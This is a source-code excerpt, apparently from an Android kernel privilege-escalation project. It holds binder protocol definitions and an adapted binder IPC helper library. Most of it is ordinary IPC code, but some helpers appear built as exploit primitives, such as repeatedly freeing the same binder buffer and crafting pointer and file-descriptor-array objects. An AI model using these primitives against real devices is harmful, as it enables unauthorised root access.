_IO('r', 6), 371 | /* 372 | * No parameters... always refers to the last transaction requested 373 | * (including replies). Note that this will be sent even for 374 | * asynchronous transactions. 375 | */ 376 | 377 | BR_INCREFS = _IOR('r', 7, struct binder_ptr_cookie), 378 | BR_ACQUIRE = _IOR('r', 8, struct binder_ptr_cookie), 379 | BR_RELEASE = _IOR('r', 9, struct binder_ptr_cookie), 380 | BR_DECREFS = _IOR('r', 10, struct binder_ptr_cookie), 381 | /* 382 | * void *: ptr to binder 383 | * void *: cookie for binder 384 | */ 385 | 386 | BR_ATTEMPT_ACQUIRE = _IOR('r', 11, struct binder_pri_ptr_cookie), 387 | /* 388 | * not currently supported 389 | * int: priority 390 | * void *: ptr to binder 391 | * void *: cookie for binder 392 | */ 393 | 394 | BR_NOOP = _IO('r', 12), 395 | /* 396 | * No parameters. Do nothing and examine the next command. It exists 397 | * primarily so that we can replace it with a BR_SPAWN_LOOPER command. 398 | */ 399 | 400 | BR_SPAWN_LOOPER = _IO('r', 13), 401 | /* 402 | * No parameters. The driver has determined that a process has no 403 | * threads waiting to service incoming transactions. When a process 404 | * receives this command, it must spawn a new service thread and 405 | * register it via bcENTER_LOOPER. 406 | */ 407 | 408 | BR_FINISHED = _IO('r', 14), 409 | /* 410 | * not currently supported 411 | * stop threadpool thread 412 | */ 413 | 414 | BR_DEAD_BINDER = _IOR('r', 15, binder_uintptr_t), 415 | /* 416 | * void *: cookie 417 | */ 418 | BR_CLEAR_DEATH_NOTIFICATION_DONE = _IOR('r', 16, binder_uintptr_t), 419 | /* 420 | * void *: cookie 421 | */ 422 | 423 | BR_FAILED_REPLY = _IO('r', 17), 424 | /* 425 | * The the last transaction (either a bcTRANSACTION or 426 | * a bcATTEMPT_ACQUIRE) failed (e.g. out of memory). No parameters. 427 | */ 428 | }; 429 | 430 | enum binder_driver_command_protocol { 431 | BC_TRANSACTION = _IOW('c', 0, struct binder_transaction_data), 432 | BC_REPLY = _IOW('c', 1, struct binder_transaction_data), 433 | /* 434 | * binder_transaction_data: the sent command. 435 | */ 436 | 437 | BC_ACQUIRE_RESULT = _IOW('c', 2, __s32), 438 | /* 439 | * not currently supported 440 | * int: 0 if the last BR_ATTEMPT_ACQUIRE was not successful. 441 | * Else you have acquired a primary reference on the object. 442 | */ 443 | 444 | BC_FREE_BUFFER = _IOW('c', 3, binder_uintptr_t), 445 | /* 446 | * void *: ptr to transaction data received on a read 447 | */ 448 | 449 | BC_INCREFS = _IOW('c', 4, __u32), 450 | BC_ACQUIRE = _IOW('c', 5, __u32), 451 | BC_RELEASE = _IOW('c', 6, __u32), 452 | BC_DECREFS = _IOW('c', 7, __u32), 453 | /* 454 | * int: descriptor 455 | */ 456 | 457 | BC_INCREFS_DONE = _IOW('c', 8, struct binder_ptr_cookie), 458 | BC_ACQUIRE_DONE = _IOW('c', 9, struct binder_ptr_cookie), 459 | /* 460 | * void *: ptr to binder 461 | * void *: cookie for binder 462 | */ 463 | 464 | BC_ATTEMPT_ACQUIRE = _IOW('c', 10, struct binder_pri_desc), 465 | /* 466 | * not currently supported 467 | * int: priority 468 | * int: descriptor 469 | */ 470 | 471 | BC_REGISTER_LOOPER = _IO('c', 11), 472 | /* 473 | * No parameters. 474 | * Register a spawned looper thread with the device. 475 | */ 476 | 477 | BC_ENTER_LOOPER = _IO('c', 12), 478 | BC_EXIT_LOOPER = _IO('c', 13), 479 | /* 480 | * No parameters. 481 | * These two commands are sent as an application-level thread 482 | * enters and exits the binder loop, respectively. They are 483 | * used so the binder can have an accurate count of the number 484 | * of looping threads it has available. 485 | */ 486 | 487 | BC_REQUEST_DEATH_NOTIFICATION = _IOW('c', 14, 488 | struct binder_handle_cookie), 489 | /* 490 | * int: handle 491 | * void *: cookie 492 | */ 493 | 494 | BC_CLEAR_DEATH_NOTIFICATION = _IOW('c', 15, 495 | struct binder_handle_cookie), 496 | /* 497 | * int: handle 498 | * void *: cookie 499 | */ 500 | 501 | BC_DEAD_BINDER_DONE = _IOW('c', 16, binder_uintptr_t), 502 | /* 503 | * void *: cookie 504 | */ 505 | 506 | BC_TRANSACTION_SG = _IOW('c', 17, struct binder_transaction_data_sg), 507 | BC_REPLY_SG = _IOW('c', 18, struct binder_transaction_data_sg), 508 | /* 509 | * binder_transaction_data_sg: the sent command. 510 | */ 511 | }; 512 | 513 | #endif /* _UAPI_LINUX_BINDER_H */ 514 | 515 | -------------------------------------------------------------------------------- /lpe/src/binder.c: -------------------------------------------------------------------------------- 1 | /* Copyright 2008 The Android Open Source Project 2 | */ 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | 14 | #include "log.h" 15 | #include "binder.h" 16 | #include "uapi_binder.h" 17 | 18 | #define MAX_BIO_SIZE (1 << 30) 19 | 20 | #define TRACE 0 21 | 22 | void bio_init_from_txn(struct binder_io *io, struct binder_transaction_data *txn); 23 | 24 | #if TRACE 25 | void hexdump(void *_data, size_t len) 26 | { 27 | unsigned char *data = _data; 28 | size_t count; 29 | 30 | for (count = 0; count < len; count++) { 31 | if ((count & 15) == 0) 32 | flog_info(stderr,"%04zu:", count); 33 | flog_info(stderr,"\\x%02x", *data); 34 | // flog_info(stderr," %02x %c", *data, 35 | // (*data < 32) || (*data > 126) ? '.' : *data); 36 | data++; 37 | if ((count & 15) == 15) 38 | flog_info(stderr,"\n"); 39 | } 40 | if ((count & 15) != 0) 41 | flog_info(stderr,"\n"); 42 | } 43 | 44 | void binder_dump_txn(struct binder_transaction_data *txn) 45 | { 46 | struct flat_binder_object *obj; 47 | binder_size_t *offs = (binder_size_t *)(uintptr_t)txn->data.ptr.offsets; 48 | size_t count = txn->offsets_size / sizeof(binder_size_t); 49 | 50 | flog_info(stderr," target %016"PRIx64" cookie %016"PRIx64" code %08x flags %08x\n", 51 | (uint64_t)txn->target.ptr, (uint64_t)txn->cookie, txn->code, txn->flags); 52 | flog_info(stderr," pid %8d uid %8d data %"PRIu64" offs %"PRIu64"\n", 53 | txn->sender_pid, txn->sender_euid, (uint64_t)txn->data_size, (uint64_t)txn->offsets_size); 54 | hexdump((void *)(uintptr_t)txn->data.ptr.buffer, txn->data_size); 55 | while (count--) { 56 | obj = (struct flat_binder_object *) (((char*)(uintptr_t)txn->data.ptr.buffer) + *offs++); 57 | flog_info(stderr," - type %08x flags %08x ptr %016"PRIx64" cookie %016"PRIx64"\n", 58 | obj->hdr.type, obj->flags, (uint64_t)obj->binder, (uint64_t)obj->cookie); 59 | } 60 | } 61 | 62 | #define NAME(n) case n: return #n 63 | const char *cmd_name(uint32_t cmd) 64 | { 65 | switch(cmd) { 66 | NAME(BR_NOOP); 67 | NAME(BR_TRANSACTION_COMPLETE); 68 | NAME(BR_INCREFS); 69 | NAME(BR_ACQUIRE); 70 | NAME(BR_RELEASE); 71 | NAME(BR_DECREFS); 72 | NAME(BR_TRANSACTION); 73 | NAME(BR_REPLY); 74 | NAME(BR_FAILED_REPLY); 75 | NAME(BR_DEAD_REPLY); 76 | NAME(BR_DEAD_BINDER); 77 | default: return "???"; 78 | } 79 | } 80 | #else 81 | #define hexdump(a,b) do{} while (0) 82 | #define binder_dump_txn(txn) do{} while (0) 83 | #endif 84 | 85 | #define NAME(n) case n: return #n 86 | const char *cmd_name(uint32_t cmd) 87 | { 88 | switch(cmd) { 89 | NAME(BR_NOOP); 90 | NAME(BR_TRANSACTION_COMPLETE); 91 | NAME(BR_INCREFS); 92 | NAME(BR_ACQUIRE); 93 | NAME(BR_RELEASE); 94 | NAME(BR_DECREFS); 95 | NAME(BR_TRANSACTION); 96 | NAME(BR_REPLY); 97 | NAME(BR_FAILED_REPLY); 98 | NAME(BR_DEAD_REPLY); 99 | NAME(BR_DEAD_BINDER); 100 | default: return "???"; 101 | } 102 | } 103 | 104 | 105 | #define BIO_F_SHARED 0x01 /* needs to be buffer freed */ 106 | #define BIO_F_OVERFLOW 0x02 /* ran out of space */ 107 | #define BIO_F_IOERROR 0x04 108 | #define BIO_F_MALLOCED 0x08 /* needs to be free()'d */ 109 | 110 | struct binder_state *binder_open(const char* driver, size_t mapsize) 111 | { 112 | struct binder_state *bs; 113 | struct binder_version vers; 114 | 115 | bs = malloc(sizeof(*bs)); 116 | if (!bs) { 117 | errno = ENOMEM; 118 | return NULL; 119 | } 120 | 121 | bs->fd = open(driver, O_RDWR | O_CLOEXEC); 122 | if (bs->fd < 0) { 123 | log_info("binder: cannot open %s (%s)\n", 124 | driver, strerror(errno)); 125 | goto fail_open; 126 | } 127 | 128 | if ((ioctl(bs->fd, BINDER_VERSION, &vers) == -1) || 129 | (vers.protocol_version != BINDER_CURRENT_PROTOCOL_VERSION)) { 130 | log_info( 131 | "binder: kernel driver version (%d) differs from user space version (%d)\n", 132 | vers.protocol_version, BINDER_CURRENT_PROTOCOL_VERSION); 133 | goto fail_open; 134 | } 135 | 136 | bs->mapsize = mapsize; 137 | bs->mapped = mmap(NULL, mapsize, PROT_READ, MAP_PRIVATE, bs->fd, 0); 138 | if (bs->mapped == MAP_FAILED) { 139 | log_info("binder: cannot map device (%s)\n", 140 | strerror(errno)); 141 | goto fail_map; 142 | } 143 | 144 | return bs; 145 | 146 | fail_map: 147 | close(bs->fd); 148 | fail_open: 149 | free(bs); 150 | return NULL; 151 | } 152 | 153 | void binder_close(struct binder_state *bs) 154 | { 155 | munmap(bs->mapped, bs->mapsize); 156 | close(bs->fd); 157 | free(bs); 158 | } 159 | 160 | int binder_become_context_manager(struct binder_state *bs) 161 | { 162 | return ioctl(bs->fd, BINDER_SET_CONTEXT_MGR, 0); 163 | } 164 | 165 | int binder_write(struct binder_state *bs, void *data, size_t len) 166 | { 167 | struct binder_write_read bwr; 168 | int res; 169 | 170 | bwr.write_size = len; 171 | bwr.write_consumed = 0; 172 | bwr.write_buffer = (uintptr_t) data; 173 | bwr.read_size = 0; 174 | bwr.read_consumed = 0; 175 | bwr.read_buffer = 0; 176 | res = ioctl(bs->fd, BINDER_WRITE_READ, &bwr); 177 | if (res < 0) { 178 | log_info("binder_write: ioctl failed (%s)\n", 179 | strerror(errno)); 180 | } 181 | return res; 182 | } 183 | 184 | /* 185 | * This is just sending 0x100 commands to free the buffer in a row, 186 | * saving us a few syscalls. 187 | */ 188 | void binder_free_buffers(struct binder_state *bs, binder_uintptr_t buffer_to_free) 189 | { 190 | struct free_buf_data { 191 | uint32_t cmd_free; 192 | binder_uintptr_t buffer; 193 | } __attribute__((packed)) ; 194 | 195 | struct free_buf_data data[0x100]; 196 | int i; 197 | 198 | for(i=0; i < 0x100; i++){ 199 | data[i].cmd_free = BC_FREE_BUFFER; 200 | data[i].buffer = buffer_to_free; 201 | } 202 | 203 | binder_write(bs, &data[0], sizeof(data)); 204 | // binder_write(bs, &data[0], sizeof(struct free_buf_data) * 0x10); 205 | 206 | } 207 | 208 | 209 | void binder_free_buffer(struct binder_state *bs, 210 | binder_uintptr_t buffer_to_free) 211 | { 212 | struct { 213 | uint32_t cmd_free; 214 | binder_uintptr_t buffer; 215 | } __attribute__((packed)) data; 216 | data.cmd_free = BC_FREE_BUFFER; 217 | data.buffer = buffer_to_free; 218 | binder_write(bs, &data, sizeof(data)); 219 | } 220 | 221 | void binder_send_reply(struct binder_state *bs, 222 | struct binder_io *reply, 223 | binder_uintptr_t buffer_to_free, 224 | int status) 225 | { 226 | struct { 227 | uint32_t cmd_free; 228 | binder_uintptr_t buffer; 229 | uint32_t cmd_reply; 230 | struct binder_transaction_data txn; 231 | } __attribute__((packed)) data; 232 | 233 | data.cmd_free = BC_FREE_BUFFER; 234 | data.buffer = buffer_to_free; 235 | data.cmd_reply = BC_REPLY; 236 | data.txn.target.ptr = 0; 237 | data.txn.cookie = 0; 238 | data.txn.code = 0; 239 | if (status) { 240 | data.txn.flags = TF_STATUS_CODE; 241 | data.txn.data_size = sizeof(int); 242 | data.txn.offsets_size = 0; 243 | data.txn.data.ptr.buffer = (uintptr_t)&status; 244 | data.txn.data.ptr.offsets = 0; 245 | } else { 246 | data.txn.flags = 0; 247 | data.txn.data_size = reply->data - reply->data0; 248 | data.txn.offsets_size = ((char*) reply->offs) - ((char*) reply->offs0); 249 | data.txn.data.ptr.buffer = (uintptr_t)reply->data0; 250 | data.txn.data.ptr.offsets = (uintptr_t)reply->offs0; 251 | } 252 | binder_write(bs, &data, sizeof(data)); 253 | } 254 | 255 | int binder_parse(struct binder_state *bs, struct binder_io *bio, 256 | uintptr_t ptr, size_t size, binder_handler func) 257 | { 258 | int r = 1; 259 | uintptr_t end = ptr + (uintptr_t) size; 260 | 261 | while (ptr < end) { 262 | uint32_t cmd = *(uint32_t *) ptr; 263 | ptr += sizeof(uint32_t); 264 | #if TRACE 265 | log_info("%s:\n", cmd_name(cmd)); 266 | #endif 267 | switch(cmd) { 268 | case BR_NOOP: 269 | break; 270 | case BR_TRANSACTION_COMPLETE: 271 | break; 272 | case BR_INCREFS: 273 | case BR_ACQUIRE: 274 | case BR_RELEASE: 275 | case BR_DECREFS: 276 | #if TRACE 277 | log_info(" %p, %p\n", (void *)ptr, (void *)(ptr + sizeof(void *))); 278 | #endif 279 | ptr += sizeof(struct binder_ptr_cookie); 280 | break; 281 | case BR_TRANSACTION: { 282 | struct binder_transaction_data *txn = (struct binder_transaction_data *) ptr; 283 | if ((end - ptr) < sizeof(*txn)) { 284 | ALOGE("parse: txn too small!\n"); 285 | return -1; 286 | } 287 | binder_dump_txn(txn); 288 | if (func) { 289 | unsigned rdata[256/4]; 290 | struct binder_io msg; 291 | struct binder_io reply; 292 | int res; 293 | 294 | bio_init(&reply, rdata, sizeof(rdata), 4); 295 | bio_init_from_txn(&msg, txn); 296 | res = func(bs, txn, &msg, &reply); 297 | if (txn->flags & TF_ONE_WAY) { 298 | binder_free_buffer(bs, txn->data.ptr.buffer); 299 | } else { 300 | binder_send_reply(bs, &reply, txn->data.ptr.buffer, res); 301 | } 302 | } 303 | ptr += sizeof(*txn); 304 | break; 305 | } 306 | case BR_REPLY: { 307 | struct binder_transaction_data *txn = (struct binder_transaction_data *) ptr; 308 | if ((end - ptr) < sizeof(*txn)) { 309 | ALOGE("parse: reply too small!\n"); 310 | return -1; 311 | } 312 | binder_dump_txn(txn); 313 | if (bio) { 314 | bio_init_from_txn(bio, txn); 315 | bio = 0; 316 | } else { 317 | /* todo FREE BUFFER */ 318 | } 319 | ptr += sizeof(*txn); 320 | r = 0; 321 | break; 322 | } 323 | case BR_DEAD_BINDER: { 324 | struct binder_death *death = (struct binder_death *)(uintptr_t) *(binder_uintptr_t *)ptr; 325 | ptr += sizeof(binder_uintptr_t); 326 | death->func(bs, death->ptr); 327 | break; 328 | } 329 | case BR_FAILED_REPLY: 330 | r = -1; 331 | break; 332 | case BR_DEAD_REPLY: 333 | r = -1; 334 | break; 335 | default: 336 | ALOGE("parse: OOPS %d\n", cmd); 337 | return -1; 338 | } 339 | } 340 | 341 | return r; 342 | } 343 | 344 | void binder_acquire(struct binder_state *bs, uint32_t target) 345 | { 346 | uint32_t cmd[2]; 347 | cmd[0] = BC_ACQUIRE; 348 | cmd[1] = target; 349 | binder_write(bs, cmd, sizeof(cmd)); 350 | } 351 | 352 | void binder_release(struct binder_state *bs, uint32_t target) 353 | { 354 | uint32_t cmd[2]; 355 | cmd[0] = BC_RELEASE; 356 | cmd[1] = target; 357 | binder_write(bs, cmd, sizeof(cmd)); 358 | } 359 | 360 | void binder_link_to_death(struct binder_state *bs, uint32_t target, struct binder_death *death) 361 | { 362 | struct { 363 | uint32_t cmd; 364 | struct binder_handle_cookie payload; 365 | } __attribute__((packed)) data; 366 | 367 | data.cmd = BC_REQUEST_DEATH_NOTIFICATION; 368 | data.payload.handle = target; 369 | data.payload.cookie = (uintptr_t) death; 370 | binder_write(bs, &data, sizeof(data)); 371 | } 372 | 373 | int binder_call(struct binder_state *bs, 374 | struct binder_io *msg, struct binder_io *reply, 375 | uint32_t target, uint32_t code) { 376 | 377 | return binder_call2(bs, msg, reply, target, code, NULL); 378 | 379 | } 380 | 381 | int binder_call2(struct binder_state *bs, 382 | struct binder_io *msg, struct binder_io *reply, 383 | uint32_t target, uint32_t code, char *buffer) 384 | { 385 | int res; 386 | struct binder_write_read bwr; 387 | struct { 388 | uint32_t cmd; 389 | struct binder_transaction_data txn; 390 | } __attribute__((packed)) writebuf; 391 | unsigned readbuf[32]; 392 | 393 | if (msg->flags & BIO_F_OVERFLOW) { 394 | log_info("binder: txn buffer overflow\n"); 395 | goto fail; 396 | } 397 | 398 | writebuf.cmd = BC_TRANSACTION; 399 | writebuf.txn.target.handle = target; 400 | writebuf.txn.code = code; 401 | writebuf.txn.flags = 0; 402 | writebuf.txn.data_size = msg->data - msg->data0; 403 | writebuf.txn.offsets_size = ((char*) msg->offs) - ((char*) msg->offs0); 404 | writebuf.txn.data.ptr.buffer = (uintptr_t)msg->data0; 405 | writebuf.txn.data.ptr.offsets = (uintptr_t)msg->offs0; 406 | 407 | bwr.write_size = sizeof(writebuf); 408 | bwr.write_consumed = 0; 409 | bwr.write_buffer = (uintptr_t) &writebuf; 410 | bwr.read_size = 0; 411 | bwr.read_consumed = 0; 412 | bwr.read_buffer = 0; 413 | 414 | // log_err("---------------- writebuf -------------\n"); 415 | // hexdump(&writebuf, sizeof(writebuf)); 416 | // log_err("---------------- Data -------------\n"); 417 | // hexdump(msg->data0, msg->data - msg->data0); 418 | // log_err("---------------- Offsets -------------\n"); 419 | // hexdump(msg->offs0, writebuf.txn.offsets_size); 420 | // log_err("IOCTL CODE: %x\n", BINDER_WRITE_READ); 421 | // log_err("DATA PTR: %p\n", msg->data0); 422 | // log_err("OFFS PTR: %p\n", msg->offs0); 423 | 424 | // log_err("---------------- bwr ------------------\n"); 425 | // hexdump(&bwr, sizeof(bwr)); 426 | 427 | for (;;) { 428 | uintptr_t thereadbuf = (buffer) ? (uintptr_t)buffer : (uintptr_t)readbuf; 429 | bwr.read_size = sizeof(readbuf); 430 | bwr.read_consumed = 0; 431 | bwr.read_buffer = thereadbuf; 432 | 433 | res = ioctl(bs->fd, BINDER_WRITE_READ, &bwr); 434 | 435 | if (res < 0) { 436 | log_info("binder: ioctl failed (%s)\n", strerror(errno)); 437 | goto fail; 438 | } 439 | 440 | res = binder_parse(bs, reply, (uintptr_t) thereadbuf, bwr.read_consumed, 0); 441 | if (res == 0) return 0; 442 | if (res < 0) goto fail; 443 | } 444 | 445 | fail: 446 | memset(reply, 0, sizeof(*reply)); 447 | reply->flags |= BIO_F_IOERROR; 448 | return -1; 449 | } 450 | 451 | int binder_call3(struct binder_state *bs, 452 | struct binder_io *msg, struct binder_io *reply, 453 | uint32_t target, uint32_t code, char *buffer) 454 | { 455 | int res; 456 | struct binder_write_read bwr; 457 | struct { 458 | uint32_t cmd; 459 | struct binder_transaction_data txn; 460 | } __attribute__((packed)) writebuf; 461 | unsigned readbuf[32]; 462 | 463 | if (msg->flags & BIO_F_OVERFLOW) { 464 | log_info("binder: txn buffer overflow\n"); 465 | goto fail; 466 | } 467 | 468 | writebuf.cmd = BC_TRANSACTION; 469 | writebuf.txn.target.handle = target; 470 | writebuf.txn.code = code; 471 | writebuf.txn.flags = 0; 472 | writebuf.txn.data_size = msg->data - msg->data0; 473 | writebuf.txn.offsets_size = ((char*) msg->offs) - ((char*) msg->offs0); 474 | writebuf.txn.data.ptr.buffer = (uintptr_t)msg->data0; 475 | writebuf.txn.data.ptr.offsets = (uintptr_t)msg->offs0; 476 | 477 | bwr.write_size = sizeof(writebuf); 478 | bwr.write_consumed = 0; 479 | bwr.write_buffer = (uintptr_t) &writebuf; 480 | bwr.read_size = 0; 481 | bwr.read_consumed = 0; 482 | bwr.read_buffer = 0; 483 | 484 | // log_err("---------------- writebuf -------------\n"); 485 | // hexdump(&writebuf, sizeof(writebuf)); 486 | // log_err("---------------- Data -------------\n"); 487 | // hexdump(msg->data0, msg->data - msg->data0); 488 | // log_err("---------------- Offsets -------------\n"); 489 | // hexdump(msg->offs0, writebuf.txn.offsets_size); 490 | // log_err("IOCTL CODE: %x\n", BINDER_WRITE_READ); 491 | // log_err("DATA PTR: %p\n", msg->data0); 492 | // log_err("OFFS PTR: %p\n", msg->offs0); 493 | 494 | // log_err("---------------- bwr ------------------\n"); 495 | // hexdump(&bwr, sizeof(bwr)); 496 | 497 | for (;;) { 498 | uintptr_t thereadbuf = (buffer) ? (uintptr_t)buffer : (uintptr_t)readbuf; 499 | bwr.read_size = sizeof(readbuf); 500 | bwr.read_consumed = 0; 501 | bwr.read_buffer = thereadbuf; 502 | 503 | res = ioctl(bs->fd, BINDER_WRITE_READ, &bwr); 504 | 505 | if (res < 0) { 506 | log_info("binder: ioctl failed (%s)\n", strerror(errno)); 507 | goto fail; 508 | } 509 | 510 | res = binder_parse(bs, reply, (uintptr_t) thereadbuf, bwr.read_consumed, 0); 511 | if (res == 0) return 0; 512 | if (res < 0) goto fail; 513 | } 514 | 515 | fail: 516 | memset(reply, 0, sizeof(*reply)); 517 | reply->flags |= BIO_F_IOERROR; 518 | return -1; 519 | } 520 | 521 | 522 | void binder_loop(struct binder_state *bs, binder_handler func) 523 | { 524 | int res; 525 | struct binder_write_read bwr; 526 | uint32_t readbuf[32]; 527 | 528 | bwr.write_size = 0; 529 | bwr.write_consumed = 0; 530 | bwr.write_buffer = 0; 531 | 532 | readbuf[0] = BC_ENTER_LOOPER; 533 | binder_write(bs, readbuf, sizeof(uint32_t)); 534 | 535 | for (;;) { 536 | bwr.read_size = sizeof(readbuf); 537 | bwr.read_consumed = 0; 538 | bwr.read_buffer = (uintptr_t) readbuf; 539 | 540 | res = ioctl(bs->fd, BINDER_WRITE_READ, &bwr); 541 | 542 | if (res < 0) { 543 | ALOGE("binder_loop: ioctl failed (%s)\n", strerror(errno)); 544 | break; 545 | } 546 | 547 | res = binder_parse(bs, 0, (uintptr_t) readbuf, bwr.read_consumed, func); 548 | if (res == 0) { 549 | ALOGE("binder_loop: unexpected reply?!\n"); 550 | break; 551 | } 552 | if (res < 0) { 553 | ALOGE("binder_loop: io error %d %s\n", res, strerror(errno)); 554 | break; 555 | } 556 | } 557 | } 558 | 559 | void binder_handle_transaction(struct binder_state *bs, binder_handler func) 560 | { 561 | int res; 562 | struct binder_write_read bwr; 563 | uint32_t readbuf[32]; 564 | 565 | bwr.write_size = 0; 566 | bwr.write_consumed = 0; 567 | bwr.write_buffer = 0; 568 | 569 | readbuf[0] = BC_ENTER_LOOPER; 570 | binder_write(bs, readbuf, sizeof(uint32_t)); 571 | 572 | bwr.read_size = sizeof(readbuf); 573 | bwr.read_consumed = 0; 574 | bwr.read_buffer = (uintptr_t) readbuf; 575 | 576 | res = ioctl(bs->fd, BINDER_WRITE_READ, &bwr); 577 | 578 | if (res < 0) { 579 | ALOGE("binder_loop: ioctl failed (%s)\n", strerror(errno)); 580 | return; 581 | } 582 | 583 | res = binder_parse(bs, 0, (uintptr_t) readbuf, bwr.read_consumed, func); 584 | if (res == 0) { 585 | ALOGE("binder_loop: unexpected reply?!\n"); 586 | return; 587 | } 588 | if (res < 0) { 589 | ALOGE("binder_loop: io error %d %s\n", res, strerror(errno)); 590 | return; 591 | } 592 | } 593 | 594 | 595 | void bio_init_from_txn(struct binder_io *bio, struct binder_transaction_data *txn) 596 | { 597 | bio->data = bio->data0 = (char *)(intptr_t)txn->data.ptr.buffer; 598 | bio->offs = bio->offs0 = (binder_size_t *)(intptr_t)txn->data.ptr.offsets; 599 | bio->data_avail = txn->data_size; 600 | bio->offs_avail = txn->offsets_size / sizeof(size_t); 601 | bio->flags = BIO_F_SHARED; 602 | 603 | } 604 | 605 | void bio_init(struct binder_io *bio, void *data, 606 | size_t maxdata, size_t maxoffs) 607 | { 608 | size_t n = maxoffs * sizeof(size_t); 609 | 610 | if (n > maxdata) { 611 | bio->flags = BIO_F_OVERFLOW; 612 | bio->data_avail = 0; 613 | bio->offs_avail = 0; 614 | return; 615 | } 616 | 617 | bio->data = bio->data0 = (char *) data + n; 618 | bio->offs = bio->offs0 = data; 619 | bio->data_avail = maxdata - n; 620 | bio->offs_avail = maxoffs; 621 | bio->flags = 0; 622 | } 623 | 624 | void *bio_alloc(struct binder_io *bio, size_t size) 625 | { 626 | size = (size + 3) & (~3); 627 | if (size > bio->data_avail) { 628 | bio->flags |= BIO_F_OVERFLOW; 629 | return NULL; 630 | } else { 631 | void *ptr = bio->data; 632 | bio->data += size; 633 | bio->data_avail -= size; 634 | return ptr; 635 | } 636 | } 637 | 638 | void binder_done(struct binder_state *bs, 639 | struct binder_io *msg, 640 | struct binder_io *reply) 641 | { 642 | struct { 643 | uint32_t cmd; 644 | uintptr_t buffer; 645 | } __attribute__((packed)) data; 646 | 647 | if (reply->flags & BIO_F_SHARED) { 648 | data.cmd = BC_FREE_BUFFER; 649 | data.buffer = (uintptr_t) reply->data0; 650 | binder_write(bs, &data, sizeof(data)); 651 | reply->flags = 0; 652 | } 653 | } 654 | 655 | static struct flat_binder_object *bio_alloc_obj(struct binder_io *bio) 656 | { 657 | struct flat_binder_object *obj; 658 | 659 | obj = bio_alloc(bio, sizeof(*obj)); 660 | 661 | if (obj && bio->offs_avail) { 662 | bio->offs_avail--; 663 | *bio->offs++ = ((char*) obj) - ((char*) bio->data0); 664 | return obj; 665 | } 666 | 667 | bio->flags |= BIO_F_OVERFLOW; 668 | return NULL; 669 | } 670 | 671 | void bio_put_uint32(struct binder_io *bio, uint32_t n) 672 | { 673 | uint32_t *ptr = bio_alloc(bio, sizeof(n)); 674 | if (ptr) 675 | *ptr = n; 676 | } 677 | 678 | void bio_put_obj(struct binder_io *bio, void *ptr) 679 | { 680 | struct flat_binder_object *obj; 681 | 682 | obj = bio_alloc_obj(bio); 683 | if (!obj) 684 | return; 685 | 686 | obj->flags = 0x7f | FLAT_BINDER_FLAG_ACCEPTS_FDS; 687 | obj->hdr.type = BINDER_TYPE_BINDER; 688 | obj->binder = (uintptr_t)ptr; 689 | obj->cookie = 0; 690 | } 691 | 692 | void bio_put_weak_obj(struct binder_io *bio, void *ptr) 693 | { 694 | struct flat_binder_object *obj; 695 | 696 | obj = bio_alloc_obj(bio); 697 | if (!obj) 698 | return; 699 | 700 | obj->flags = 0x7f | FLAT_BINDER_FLAG_ACCEPTS_FDS; 701 | obj->hdr.type = BINDER_TYPE_WEAK_BINDER; 702 | obj->binder = (uintptr_t)ptr; 703 | obj->cookie = 0; 704 | 705 | 706 | } 707 | 708 | 709 | /* Add an offset to the list. */ 710 | void bio_add_offset(struct binder_io *bio, uint64_t offset) 711 | { 712 | if (!bio->offs_avail) 713 | return; 714 | bio->offs_avail--; 715 | *bio->offs++ = offset; 716 | } 717 | 718 | /* Create a BINDER_TYPE_PTR object, which will contain arbitrary data. This can for example 719 | * be used to contains an array of file descriptors as used by the BINDER_TYPE_FDA, which 720 | * references the array within the BINDER_TYPE_PTR object. 721 | * The function returns a pointer to the allocated data, so that it can be set. If the "off" 722 | * pointer is submitted to the function, it will set it as well. 723 | */ 724 | void *bio_put_ptr(struct binder_io *bio, void *buffer, uint32_t size, uint32_t *off) 725 | { 726 | struct binder_buffer_object *obj; 727 | // uint32_t _off = (bio->data - bio->data0); 728 | 729 | 730 | /* Allocate the object size + the size of the data we want it to contain. */ 731 | obj = bio_alloc(bio, sizeof(*obj) + size); 732 | if (!obj) 733 | return NULL; 734 | 735 | if (obj && bio->offs_avail) { 736 | bio->offs_avail--; 737 | *bio->offs++ = ((char*) obj) - ((char*) bio->data0); 738 | } 739 | 740 | /* Compute the offset index. */ 741 | obj->hdr.type = BINDER_TYPE_PTR; 742 | obj->flags |= BIO_F_OVERFLOW; 743 | obj->buffer = NULL; /* The buffer address will need a fixup, this is dealt with the bio_fixup_ptr. */ 744 | obj->length = size; 745 | obj->parent = 0; 746 | obj->parent_offset = 0; 747 | 748 | /* Copy the data to the binder buffer. */ 749 | memcpy((obj + 1), buffer, size); 750 | 751 | if (off) 752 | *off = ((uint64_t)bio->offs - (uint64_t)bio->offs0) / sizeof(uint64_t) - 1; 753 | 754 | return NULL; 755 | } 756 | 757 | /* Fixup a ptr address of a BINDER_TYPE_PTR object given it's offset. */ 758 | void bio_fixup_ptr(struct binder_io *bio, void *base, uint32_t ptr_off) 759 | { 760 | struct binder_buffer_object *obj; 761 | 762 | //TODO: Check the offset. 763 | 764 | /* Check it's actually a BINDER_TYPE_PTR */ 765 | obj = (struct binder_buffer_object *)(bio->data0 + bio->offs0[ptr_off]); 766 | if (obj->hdr.type != BINDER_TYPE_PTR) { 767 | log_err("bio_fixup_ptr() -> Not a binder buffer object.\n"); 768 | exit(1); 769 | return; 770 | } 771 | 772 | uint64_t buffer_off = bio->offs0[ptr_off] + sizeof(*obj); 773 | 774 | obj->buffer = base + buffer_off; 775 | log_info("obj->buffer: %p\n", obj->buffer); 776 | } 777 | 778 | /* 779 | * Create a BINDER_TYPE_FDA object, and give in parameters the parent offset in 780 | * the transaction, as well as the number of file descriptors, and the offset within 781 | * the parent BINDER_TYPE_PTR object. 782 | */ 783 | void bio_put_fd_array(struct binder_io *bio, uint64_t parent, uint64_t parent_offset, int num_fds) 784 | { 785 | int i; 786 | struct binder_fd_array_object *fd_obj; 787 | 788 | /* Allocate the object containing the array. */ 789 | fd_obj = bio_alloc(bio, sizeof(*fd_obj)); 790 | if (!fd_obj) 791 | return; 792 | 793 | if (fd_obj && bio->offs_avail) { 794 | bio->offs_avail--; 795 | *bio->offs++ = ((char*) fd_obj) - ((char*) bio->data0); 796 | } 797 | 798 | fd_obj->hdr.type = BINDER_TYPE_FDA; 799 | fd_obj->num_fds = num_fds; 800 | fd_obj->parent = parent; 801 | fd_obj->parent_offset = parent_offset; 802 | } 803 | 804 | void bio_put_fd(struct binder_io *bio, int 